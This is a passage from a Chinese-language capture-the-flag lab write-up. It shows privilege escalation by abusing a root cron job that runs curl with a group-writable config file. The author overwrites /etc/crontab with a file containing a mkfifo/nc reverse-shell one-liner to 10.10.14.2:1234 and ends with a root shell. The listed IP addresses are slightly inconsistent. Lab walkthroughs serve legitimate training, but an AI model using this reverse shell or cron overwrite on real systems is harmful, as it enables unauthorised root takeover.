2022/10/14 10:50:01 CMD: UID=0    PID=2664   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input 
2022/10/14 10:50:01 CMD: UID=0    PID=2663   | /usr/sbin/CRON -f 
2022/10/14 10:50:01 CMD: UID=0    PID=2662   | /usr/sbin/CRON -f 
2022/10/14 10:50:01 CMD: UID=0    PID=2667   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

发现 cron 在运行, curl -K 选项用于指定配置文件,cron 使用输入作为配置和输出报告。

$ cat /home/floris/admin-area/input 
url = "http://127.0.0.1"

$ ls -la /home/floris/admin-area/input 
-rw-rw---- 1 root floris 25 Oct 14 11:00 /home/floris/admin-area/input


输入文件归当前组所有,可以编写自己的配置。output可指定输出文件。创建一个恶意的 crontab 并覆盖 input

操作配置

首先本地机器新建恶意 crontab 文件,并启动一个简单的 http 服务器

$ cp /etc/crontab .
$ echo '* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 1234 >/tmp/f ' >> crontab
python3 -m http.server 80

floris 用户下修改 input 文件内容,url 指向本地机器 crontab 恶意文件

url = "http://10.10.14.20/crontab"
output = "/etc/crontab"

建立监听,查看 input 文件以写入到 curl 中,等待 shell 回连

$ nc -lvp 1234

$ cat input

成功获取 Root 权限 ```shell $ nc -lvp 1234 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.129.106.157. Ncat: Connection from 10.129.106.157:36182. /bin/sh: 0: can not access tty; job control turned off

whoami

root ```h